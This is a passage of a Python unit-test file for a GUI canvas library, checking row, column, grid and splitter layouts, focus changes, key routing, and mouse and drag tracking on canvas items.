self.assertEqual(canvas_item.canvas_items[1].canvas_size, Geometry.IntSize(width=500, height=300))
self.assertEqual(canvas_item.canvas_items[2].canvas_origin, Geometry.IntPoint(x=0, y=300))
self.assertEqual(canvas_item.canvas_items[2].canvas_size, Geometry.IntSize(width=140, height=180))
self.assertEqual(canvas_item.canvas_items[3].canvas_origin, Geometry.IntPoint(x=140, y=300))
self.assertEqual(canvas_item.canvas_items[3].canvas_size, Geometry.IntSize(width=500, height=180))
def test_grid_layout_within_column_layout(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
grid_canvas = CanvasItem.CanvasItemComposition()
grid_canvas.layout = CanvasItem.CanvasItemGridLayout(Geometry.IntSize(2, 2))
grid_canvas.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"), Geometry.IntPoint(x=0, y=0))
grid_canvas.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"), Geometry.IntPoint(x=1, y=0))
grid_canvas.add_canvas_item(CanvasItem.BackgroundCanvasItem("#888"), Geometry.IntPoint(x=0, y=1))
grid_canvas.add_canvas_item(CanvasItem.BackgroundCanvasItem("#00F"), Geometry.IntPoint(x=1, y=1))
background = CanvasItem.BackgroundCanvasItem("#F00")
canvas_item.add_canvas_item(background)
canvas_item.add_canvas_item(grid_canvas)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(background.canvas_origin, Geometry.IntPoint(x=0, y=0))
self.assertEqual(background.canvas_size, Geometry.IntSize(width=320, height=480))
self.assertEqual(grid_canvas.canvas_origin, Geometry.IntPoint(x=320, y=0))
self.assertEqual(grid_canvas.canvas_size, Geometry.IntSize(width=320, height=480))
self.assertEqual(grid_canvas.canvas_items[0].canvas_origin, Geometry.IntPoint(x=0, y=0))
self.assertEqual(grid_canvas.canvas_items[0].canvas_size, Geometry.IntSize(width=160, height=240))
self.assertEqual(grid_canvas.canvas_items[1].canvas_origin, Geometry.IntPoint(x=160, y=0))
self.assertEqual(grid_canvas.canvas_items[1].canvas_size, Geometry.IntSize(width=160, height=240))
self.assertEqual(grid_canvas.canvas_items[2].canvas_origin, Geometry.IntPoint(x=0, y=240))
self.assertEqual(grid_canvas.canvas_items[2].canvas_size, Geometry.IntSize(width=160, height=240))
self.assertEqual(grid_canvas.canvas_items[3].canvas_origin, Geometry.IntPoint(x=160, y=240))
self.assertEqual(grid_canvas.canvas_items[3].canvas_size, Geometry.IntSize(width=160, height=240))
def test_focus_changed_messages_sent_when_focus_changes(self):
# setup canvas
ui = TestUI.UserInterface()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = canvas_widget.canvas_item
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
canvas_item1 = TestCanvasItem()
canvas_item2 = TestCanvasItem()
canvas_item1.focusable = True
canvas_item2.focusable = True
focus_changed_set = set()
def focus_changed1(focused):
focus_changed_set.add(canvas_item1)
def focus_changed2(focused):
focus_changed_set.add(canvas_item2)
canvas_item1.on_focus_changed = focus_changed1
canvas_item2.on_focus_changed = focus_changed2
canvas_item.add_canvas_item(canvas_item1)
canvas_item.add_canvas_item(canvas_item2)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
# check assumptions
self.assertIsNone(canvas_item.focused_item)
self.assertFalse(canvas_item1.focused)
self.assertFalse(canvas_item2.focused)
# click in item 1 and check that focus was updated and changed
modifiers = CanvasItem.KeyboardModifiers()
canvas_item.canvas_widget.simulate_mouse_click(160, 240, modifiers)
self.assertTrue(canvas_item1.focused)
self.assertTrue(canvas_item1 in focus_changed_set)
self.assertFalse(canvas_item2.focused)
self.assertFalse(canvas_item2 in focus_changed_set)
self.assertEqual(canvas_item.focused_item, canvas_item1)
# click in item 2 and check that focus was updated and changed
focus_changed_set.clear()
canvas_item.canvas_widget.simulate_mouse_click(160 + 320, 240, modifiers)
self.assertFalse(canvas_item1.focused)
self.assertTrue(canvas_item1 in focus_changed_set)
self.assertTrue(canvas_item2.focused)
self.assertTrue(canvas_item2 in focus_changed_set)
self.assertEqual(canvas_item.focused_item, canvas_item2)
def test_root_canvas_item_loses_focus_too_when_canvas_widget_loses_focus(self):
# setup canvas
ui = TestUI.UserInterface()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = canvas_widget.canvas_item
canvas_item.focusable = True
canvas_item.wants_mouse_events = True
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
# check assumptions
modifiers = CanvasItem.KeyboardModifiers()
self.assertIsNone(canvas_item.focused_item)
self.assertFalse(canvas_item.focused)
canvas_item.canvas_widget.simulate_mouse_click(320, 240, modifiers)
self.assertTrue(canvas_item.focused)
self.assertEqual(canvas_item.focused_item, canvas_item) # refers to itself??
# become unfocused
canvas_item.canvas_widget.on_focus_changed(False)
self.assertFalse(canvas_item.focused)
self.assertIsNone(canvas_item.focused_item)
def test_keys_go_to_focused_item(self):
# setup canvas
ui = TestUI.UserInterface()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = canvas_widget.canvas_item
canvas_item.layout = CanvasItem.CanvasItemRowLayout()
canvas_item1 = TestCanvasItem()
canvas_item2 = TestCanvasItem()
canvas_item1.focusable = True
canvas_item2.focusable = True
canvas_item.add_canvas_item(canvas_item1)
canvas_item.add_canvas_item(canvas_item2)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
# click in item 1, then 2 and check key goes to 2nd item
modifiers = CanvasItem.KeyboardModifiers()
canvas_item.canvas_widget.simulate_mouse_click(160, 240, modifiers)
canvas_item.canvas_widget.simulate_mouse_click(160 + 320, 240, modifiers)
# check assumptions
self.assertFalse(canvas_item1.focused)
self.assertTrue(canvas_item2.focused)
# key should go to 2nd item
canvas_item.canvas_widget.on_key_pressed('a')
# check result
self.assertIsNone(canvas_item1.key)
self.assertEqual(canvas_item2.key, 'a')
# now back to first item
canvas_item1.key = None
canvas_item2.key = None
canvas_item.canvas_widget.simulate_mouse_click(160, 240, modifiers)
canvas_item.canvas_widget.on_key_pressed('a')
self.assertEqual(canvas_item1.key, 'a')
self.assertIsNone(canvas_item2.key)
def test_composition_layout_sizing_has_infinite_maximum_if_first_child_is_finite_and_one_is_infinite(self):
composition = CanvasItem.CanvasItemComposition()
composition.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
composition.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
composition.canvas_items[0].sizing.maximum_height = 40
composition.canvas_items[0].sizing.minimum_height = 40
composition.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(composition.layout_sizing.minimum_height, 40)
self.assertIsNone(composition.layout_sizing.maximum_height)
def test_composition_layout_sizing_has_infinite_maximum_if_last_child_is_finite_and_one_is_infinite(self):
composition = CanvasItem.CanvasItemComposition()
composition.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
composition.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
composition.canvas_items[1].sizing.maximum_height = 40
composition.canvas_items[1].sizing.minimum_height = 40
composition.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(composition.layout_sizing.minimum_height, 40)
self.assertIsNone(composition.layout_sizing.maximum_height)
def test_column_layout_sizing_has_infinite_maximum_if_one_child_is_finite_and_one_is_infinite(self):
composition = CanvasItem.CanvasItemComposition()
composition.layout = CanvasItem.CanvasItemColumnLayout()
composition.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
composition.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
composition.canvas_items[0].sizing.maximum_height = 40
composition.canvas_items[0].sizing.minimum_height = 40
composition.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(composition.layout_sizing.minimum_height, 40)
self.assertIsNone(composition.layout_sizing.maximum_height)
def test_grid_layout_sizing_has_infinite_maximum_if_one_child_is_finite_and_one_is_infinite(self):
grid_canvas = CanvasItem.CanvasItemComposition()
grid_canvas.layout = CanvasItem.CanvasItemGridLayout(Geometry.IntSize(2, 2))
grid_canvas.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"), Geometry.IntPoint(x=0, y=0))
grid_canvas.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"), Geometry.IntPoint(x=1, y=0))
grid_canvas.add_canvas_item(CanvasItem.BackgroundCanvasItem("#888"), Geometry.IntPoint(x=0, y=1))
grid_canvas.add_canvas_item(CanvasItem.BackgroundCanvasItem("#00F"), Geometry.IntPoint(x=1, y=1))
grid_canvas.canvas_items[0].sizing.maximum_height = 40
grid_canvas.canvas_items[0].sizing.minimum_height = 40
grid_canvas.canvas_items[0].sizing.maximum_width = 40
grid_canvas.canvas_items[0].sizing.minimum_width = 40
grid_canvas.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(grid_canvas.layout_sizing.minimum_height, 40)
self.assertIsNone(grid_canvas.layout_sizing.maximum_height)
self.assertEqual(grid_canvas.layout_sizing.minimum_width, 40)
self.assertIsNone(grid_canvas.layout_sizing.maximum_width)
def test_height_constraint_inside_layout_with_another_height_constraint_results_in_proper_layout(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemColumnLayout()
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
canvas_item.canvas_items[0].sizing.maximum_height = 10
canvas_item.canvas_items[0].sizing.minimum_height = 10
composition = CanvasItem.CanvasItemComposition()
composition.layout = CanvasItem.CanvasItemColumnLayout()
composition.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"))
composition.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
composition.canvas_items[1].sizing.maximum_height = 40
composition.canvas_items[1].sizing.minimum_height = 40
canvas_item.add_canvas_item(composition)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_items[0].canvas_origin, Geometry.IntPoint(x=0, y=0))
self.assertEqual(canvas_item.canvas_items[0].canvas_size, Geometry.IntSize(width=640, height=10))
self.assertEqual(canvas_item.canvas_items[1].canvas_origin, Geometry.IntPoint(x=0, y=10))
self.assertEqual(canvas_item.canvas_items[1].canvas_size, Geometry.IntSize(width=640, height=470))
def test_grid_layout_2x2_canvas_item_at_point(self):
# test row layout
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemGridLayout(Geometry.IntSize(2, 2), spacing=20, margins=Geometry.Margins(top=10, bottom=10, left=10, right=10))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#F00"), Geometry.IntPoint(x=0, y=0))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"), Geometry.IntPoint(x=1, y=0))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#888"), Geometry.IntPoint(x=0, y=1))
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#00F"), Geometry.IntPoint(x=1, y=1))
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item.canvas_item_at_point(5, 5), canvas_item)
self.assertEqual(canvas_item.canvas_item_at_point(20, 20), canvas_item.canvas_items[0])
self.assertEqual(canvas_item.canvas_item_at_point(320, 20), canvas_item)
self.assertEqual(canvas_item.canvas_item_at_point(340, 20), canvas_item.canvas_items[1])
self.assertEqual(canvas_item.canvas_item_at_point(320, 240), canvas_item)
self.assertEqual(canvas_item.canvas_item_at_point(300, 260), canvas_item.canvas_items[2])
self.assertEqual(canvas_item.canvas_item_at_point(340, 260), canvas_item.canvas_items[3])
def test_grid_layout_2x2_canvas_item_scroll_area_with_content_and_scroll_bars_inside_column_lays_out_properly(self):
# test row layout
column = CanvasItem.CanvasItemComposition()
column.layout = CanvasItem.CanvasItemColumnLayout()
content = CanvasItem.BackgroundCanvasItem("#F00")
content.sizing.set_fixed_size(Geometry.IntSize(width=250, height=60))
scroll_area_canvas_item = CanvasItem.ScrollAreaCanvasItem(content)
scroll_area_canvas_item.auto_resize_contents = True
right_canvas_item = CanvasItem.ScrollBarCanvasItem(scroll_area_canvas_item)
bottom_canvas_item = CanvasItem.ScrollBarCanvasItem(scroll_area_canvas_item, CanvasItem.Orientation.Horizontal)
bottom_canvas_item.sizing.set_fixed_height(20)
canvas_item = CanvasItem.CanvasItemComposition()
canvas_item.layout = CanvasItem.CanvasItemGridLayout(Geometry.IntSize(width=2, height=2))
canvas_item.add_canvas_item(scroll_area_canvas_item, Geometry.IntPoint(x=0, y=0))
canvas_item.add_canvas_item(right_canvas_item, Geometry.IntPoint(x=1, y=0))
canvas_item.add_canvas_item(bottom_canvas_item, Geometry.IntPoint(x=0, y=1))
column.add_canvas_item(canvas_item)
column.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=200, height=100))
self.assertEqual(scroll_area_canvas_item.canvas_rect, Geometry.IntRect.from_tlbr(0, 0, 80, 184))
self.assertEqual(right_canvas_item.canvas_rect, Geometry.IntRect.from_tlbr(0, 184, 80, 200))
self.assertEqual(bottom_canvas_item.canvas_rect, Geometry.IntRect.from_tlbr(80, 0, 100, 184))
def test_item_in_column_layout_with_preferred_less_than_min_expands(self):
column = CanvasItem.CanvasItemComposition()
column.layout = CanvasItem.CanvasItemColumnLayout()
column.add_spacing(20)
item = CanvasItem.EmptyCanvasItem()
item.sizing.preferred_height = 10
item.sizing.minimum_height = 20
column.add_canvas_item(item)
column.add_spacing(20)
column.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=30, height=100))
self.assertEqual(column.canvas_items[0].canvas_rect, Geometry.IntRect.from_tlbr(0, 15, 20, 15))
self.assertEqual(column.canvas_items[1].canvas_rect, Geometry.IntRect.from_tlbr(20, 0, 80, 30))
self.assertEqual(column.canvas_items[2].canvas_rect, Geometry.IntRect.from_tlbr(80, 15, 100, 15))
class TestCanvasItem(CanvasItem.CanvasItemComposition):
def __init__(self):
super(TestCanvasItemClass.TestCanvasItem, self).__init__()
self.mouse_inside = False
self.mouse_pos = None
self.mouse_pressed_pos = None
self.drag_inside = False
self.drag_pos = None
self.repaint_count = 0
self.repaint_delay = 0.0
def mouse_entered(self):
self.mouse_inside = True
def mouse_exited(self):
self.mouse_inside = False
self.mouse_pos = None
def mouse_position_changed(self, x, y, modifiers):
self.mouse_pos = Geometry.IntPoint(y=y, x=x)
def mouse_pressed(self, x, y, modifiers):
self.mouse_pressed_pos = Geometry.IntPoint(y=y, x=x)
def mouse_released(self, x, y, modifiers):
self.mouse_pressed_pos = None
def drag_enter(self, mime_data):
self.drag_inside = True
def drag_leave(self):
self.drag_inside = False
self.drag_pos = None
def drag_move(self, mime_data, x, y):
self.drag_pos = Geometry.IntPoint(y=y, x=x)
def drop(self, mime_data, x, y):
return "copy"
def _repaint(self, drawing_context):
self.repaint_count += 1
time.sleep(self.repaint_delay)
super()._repaint(drawing_context)
def test_mouse_tracking_on_topmost_non_overlapped_canvas_item(self):
ui = TestUI.UserInterface()
# test row layout
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = canvas_widget.canvas_item
container_canvas_item = CanvasItem.CanvasItemComposition()
test_canvas_item = TestCanvasItemClass.TestCanvasItem()
test_canvas_item.wants_mouse_events = True
container_canvas_item.add_canvas_item(test_canvas_item)
canvas_item.add_canvas_item(container_canvas_item)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
modifiers = CanvasItem.KeyboardModifiers()
# check assumptions
self.assertFalse(test_canvas_item.mouse_inside)
# run test
canvas_item.canvas_widget.on_mouse_entered()
canvas_item.canvas_widget.on_mouse_position_changed(320, 240, modifiers)
self.assertTrue(test_canvas_item.mouse_inside)
self.assertEqual(test_canvas_item.mouse_pos, Geometry.IntPoint(x=320, y=240))
canvas_item.canvas_widget.on_mouse_exited()
self.assertFalse(test_canvas_item.mouse_inside)
def test_mouse_tracking_on_container_with_non_overlapped_canvas_item(self):
ui = TestUI.UserInterface()
# test row layout
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = canvas_widget.canvas_item
test_canvas_item = TestCanvasItemClass.TestCanvasItem()
test_canvas_item.wants_mouse_events = True
test_canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#00F"))
canvas_item.add_canvas_item(test_canvas_item)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
modifiers = CanvasItem.KeyboardModifiers()
# check assumptions
self.assertFalse(test_canvas_item.mouse_inside)
# run test
canvas_item.canvas_widget.on_mouse_entered()
canvas_item.canvas_widget.on_mouse_position_changed(320, 240, modifiers)
self.assertTrue(test_canvas_item.mouse_inside)
self.assertEqual(test_canvas_item.mouse_pos, Geometry.IntPoint(x=320, y=240))
canvas_item.canvas_widget.on_mouse_exited()
self.assertFalse(test_canvas_item.mouse_inside)
def test_mouse_tracking_on_container_with_two_overlapped_canvas_items(self):
# tests case where container contains a mouse tracking canvas item with a non-mouse
# tracking canvas item overlayed.
ui = TestUI.UserInterface()
# test row layout
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = canvas_widget.canvas_item
test_canvas_item = TestCanvasItemClass.TestCanvasItem()
test_canvas_item.wants_mouse_events = True
test_canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#00F"))
canvas_item.add_canvas_item(test_canvas_item)
canvas_item.add_canvas_item(CanvasItem.BackgroundCanvasItem("#0F0"))
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
modifiers = CanvasItem.KeyboardModifiers()
# check assumptions
self.assertFalse(test_canvas_item.mouse_inside)
# run test
canvas_item.canvas_widget.on_mouse_entered()
canvas_item.canvas_widget.on_mouse_position_changed(320, 240, modifiers)
self.assertTrue(test_canvas_item.mouse_inside)
self.assertEqual(test_canvas_item.mouse_pos, Geometry.IntPoint(x=320, y=240))
canvas_item.canvas_widget.on_mouse_exited()
self.assertFalse(test_canvas_item.mouse_inside)
def test_drag_tracking_on_topmost_non_overlapped_canvas_item(self):
ui = TestUI.UserInterface()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = canvas_widget.canvas_item
container_canvas_item = CanvasItem.CanvasItemComposition()
test_canvas_item = TestCanvasItemClass.TestCanvasItem()
test_canvas_item.wants_drag_events = True
container_canvas_item.add_canvas_item(test_canvas_item)
canvas_item.add_canvas_item(container_canvas_item)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
# check assumptions
self.assertFalse(test_canvas_item.drag_inside)
# run test
self.assertEqual(canvas_item.canvas_widget.on_drag_enter(None), "accept")
canvas_item.canvas_widget.on_drag_move(None, 320, 240)
self.assertTrue(test_canvas_item.drag_inside)
self.assertEqual(test_canvas_item.drag_pos, Geometry.IntPoint(x=320, y=240))
self.assertEqual(canvas_item.canvas_widget.on_drop(None, 320, 240), "copy")
self.assertFalse(test_canvas_item.drag_inside)
def test_drag_tracking_from_one_item_to_another(self):
ui = TestUI.UserInterface()
modifiers = CanvasItem.KeyboardModifiers()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = canvas_widget.canvas_item
container_canvas_item = CanvasItem.CanvasItemComposition()
container_canvas_item.layout = CanvasItem.CanvasItemRowLayout()
test_canvas_item1 = TestCanvasItemClass.TestCanvasItem()
test_canvas_item1.wants_mouse_events = True
test_canvas_item1.wants_drag_events = True
container_canvas_item.add_canvas_item(test_canvas_item1)
canvas_item.add_canvas_item(container_canvas_item)
test_canvas_item2 = TestCanvasItemClass.TestCanvasItem()
test_canvas_item2.wants_mouse_events = True
container_canvas_item.add_canvas_item(test_canvas_item2)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
# check assumptions
canvas_item.canvas_widget.on_mouse_entered()
canvas_item.canvas_widget.on_mouse_position_changed(160, 160, modifiers)
canvas_item.canvas_widget.on_mouse_pressed(160, 160, modifiers)
self.assertEqual(test_canvas_item1.mouse_pressed_pos, (160, 160))
canvas_item.canvas_widget.on_mouse_released(160, 160, modifiers)
self.assertIsNone(test_canvas_item1.mouse_pressed_pos)
# now the drag. start in the right item, press mouse, move to left item
# release mouse; press mouse again in left pane and verify it is in the left pane
canvas_item.canvas_widget.on_mouse_position_changed(480, 160, modifiers)
canvas_item.canvas_widget.on_mouse_pressed(480, 160, modifiers)
canvas_item.canvas_widget.on_mouse_position_changed(160, 160, modifiers)
canvas_item.canvas_widget.on_mouse_released(160, 160, modifiers)
# immediate mouse press after mouse release
canvas_item.canvas_widget.on_mouse_pressed(160, 160, modifiers)
self.assertEqual(test_canvas_item1.mouse_pressed_pos, (160, 160))
self.assertIsNone(test_canvas_item2.mouse_pressed_pos)
canvas_item.canvas_widget.on_mouse_released(160, 160, modifiers)
def test_mouse_tracking_after_drag_from_one_item_to_another(self):
ui = TestUI.UserInterface()
modifiers = CanvasItem.KeyboardModifiers()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = canvas_widget.canvas_item
container_canvas_item = CanvasItem.CanvasItemComposition()
container_canvas_item.layout = CanvasItem.CanvasItemRowLayout()
test_canvas_item1 = TestCanvasItemClass.TestCanvasItem()
test_canvas_item1.wants_mouse_events = True
test_canvas_item1.wants_drag_events = True
container_canvas_item.add_canvas_item(test_canvas_item1)
canvas_item.add_canvas_item(container_canvas_item)
test_canvas_item2 = TestCanvasItemClass.TestCanvasItem()
test_canvas_item2.wants_mouse_events = True
container_canvas_item.add_canvas_item(test_canvas_item2)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
# check assumptions
canvas_item.canvas_widget.on_mouse_entered()
canvas_item.canvas_widget.on_mouse_position_changed(160, 160, modifiers)
self.assertTrue(test_canvas_item1.mouse_inside)
self.assertFalse(test_canvas_item2.mouse_inside)
self.assertEqual(test_canvas_item1.mouse_pos, (160, 160))
self.assertEqual(test_canvas_item2.mouse_pos, None)
canvas_item.canvas_widget.on_mouse_position_changed(480, 160, modifiers)
self.assertFalse(test_canvas_item1.mouse_inside)
self.assertTrue(test_canvas_item2.mouse_inside)
self.assertEqual(test_canvas_item1.mouse_pos, None)
self.assertEqual(test_canvas_item2.mouse_pos, (160, 160)) # relative pos
# now the drag. start in the right item, press mouse, move to left item
# release mouse; press mouse again in left pane and verify it is in the left pane
canvas_item.canvas_widget.on_mouse_position_changed(480, 160, modifiers)
canvas_item.canvas_widget.on_mouse_pressed(480, 160, modifiers)
canvas_item.canvas_widget.on_mouse_position_changed(160, 160, modifiers)
canvas_item.canvas_widget.on_mouse_released(160, 160, modifiers)
# check mouse tracking
self.assertTrue(test_canvas_item1.mouse_inside)
self.assertFalse(test_canvas_item2.mouse_inside)
self.assertEqual(test_canvas_item1.mouse_pos, (160, 160))
self.assertEqual(test_canvas_item2.mouse_pos, None)
def test_layout_splitter_within_splitter(self):
canvas_item = CanvasItem.CanvasItemComposition()
splitter_outer = CanvasItem.SplitterCanvasItem()
splitter_inner = CanvasItem.SplitterCanvasItem()
canvas_item1 = TestCanvasItem()
canvas_item2 = TestCanvasItem()
canvas_item3 = TestCanvasItem()
splitter_inner.add_canvas_item(canvas_item2)
splitter_inner.add_canvas_item(canvas_item3)
splitter_outer.add_canvas_item(canvas_item1)
splitter_outer.add_canvas_item(splitter_inner)
canvas_item.add_canvas_item(splitter_outer)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect.from_tlbr(0, 0, 480, 320))
self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect.from_tlbr(0, 0, 480, 160))
self.assertEqual(canvas_item3.canvas_rect, Geometry.IntRect.from_tlbr(0, 160, 480, 320))
def test_dragging_splitter_resizes_children(self):
# setup canvas
ui = TestUI.UserInterface()
canvas_widget = ui.create_canvas_widget()
with contextlib.closing(canvas_widget):
canvas_item = canvas_widget.canvas_item
splitter = CanvasItem.SplitterCanvasItem()
canvas_item1 = TestCanvasItem()
canvas_item2 = TestCanvasItem()
splitter.add_canvas_item(canvas_item1)
splitter.add_canvas_item(canvas_item2)
canvas_item.add_canvas_item(splitter)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
# check assumptions
self.assertAlmostEqual(splitter.splits[0], 0.5)
self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=320, height=480)))
self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=320, y=0), size=Geometry.IntSize(width=320, height=480)))
# drag splitter
self.simulate_drag(canvas_widget, Geometry.IntPoint(x=320, y=240), Geometry.IntPoint(x=480, y=240))
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480), immediate=True)
self.assertAlmostEqual(splitter.splits[0], 0.75)
self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=480, height=480)))
self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=480, y=0), size=Geometry.IntSize(width=160, height=480)))
def test_setting_splitter_initial_values_results_in_correct_layout(self):
# setup canvas
canvas_item = CanvasItem.CanvasItemComposition()
splitter = CanvasItem.SplitterCanvasItem()
canvas_item1 = TestCanvasItem()
canvas_item2 = TestCanvasItem()
splitter.add_canvas_item(canvas_item1)
splitter.add_canvas_item(canvas_item2)
splitter.splits = [0.4, 0.6]
canvas_item.add_canvas_item(splitter)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
# check layout
self.assertAlmostEqual(splitter.splits[0], 0.4)
self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=256, height=480)))
self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=256, y=0), size=Geometry.IntSize(width=640-256, height=480)))
def test_setting_splitter_values_after_adding_item_results_in_correct_layout(self):
# setup canvas
canvas_item = CanvasItem.CanvasItemComposition()
splitter = CanvasItem.SplitterCanvasItem()
canvas_item1 = TestCanvasItem()
canvas_item2 = TestCanvasItem()
splitter.add_canvas_item(canvas_item1)
splitter.splits = [1.0]
canvas_item.add_canvas_item(splitter)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
splitter.add_canvas_item(canvas_item2)
splitter.splits = [0.4, 0.6]
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
# check layout
self.assertAlmostEqual(splitter.splits[0], 0.4)
self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=256, height=480)))
self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=256, y=0), size=Geometry.IntSize(width=640-256, height=480)))
def test_resizing_splitter_in_splitter_results_in_correct_layout(self):
# setup canvas
canvas_item = CanvasItem.CanvasItemComposition()
splitter = CanvasItem.SplitterCanvasItem()
splitter_in = CanvasItem.SplitterCanvasItem("horizontal")
canvas_item1 = TestCanvasItem()
canvas_item2 = TestCanvasItem()
canvas_item3 = TestCanvasItem()
splitter_in.add_canvas_item(canvas_item1)
splitter_in.add_canvas_item(canvas_item3)
splitter.add_canvas_item(splitter_in)
splitter.add_canvas_item(canvas_item2)
splitter_in.splits = [0.5, 0.5]
splitter.splits = [0.5, 0.5]
canvas_item.add_canvas_item(splitter)
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=480))
self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=320, height=240)))
self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=320, y=0), size=Geometry.IntSize(width=320, height=480)))
self.assertEqual(canvas_item3.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=240), size=Geometry.IntSize(width=320, height=240)))
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=640, height=640))
self.assertEqual(canvas_item1.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=320, height=320)))
self.assertEqual(canvas_item2.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=320, y=0), size=Geometry.IntSize(width=320, height=640)))
self.assertEqual(canvas_item3.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=320), size=Geometry.IntSize(width=320, height=320)))
def test_splitters_within_splitter_result_in_correct_origins(self):
# setup canvas
canvas_item = CanvasItem.CanvasItemComposition()
splitter = CanvasItem.SplitterCanvasItem()
